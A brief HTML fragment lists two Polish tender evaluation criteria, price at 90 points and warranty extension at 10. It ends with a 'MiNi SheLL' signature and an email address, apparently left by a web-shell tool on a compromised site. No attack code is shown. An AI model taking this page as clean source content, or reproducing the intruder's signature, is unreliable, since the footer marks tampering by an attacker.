<li>1. Cena - 90</li>
<li>2. Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com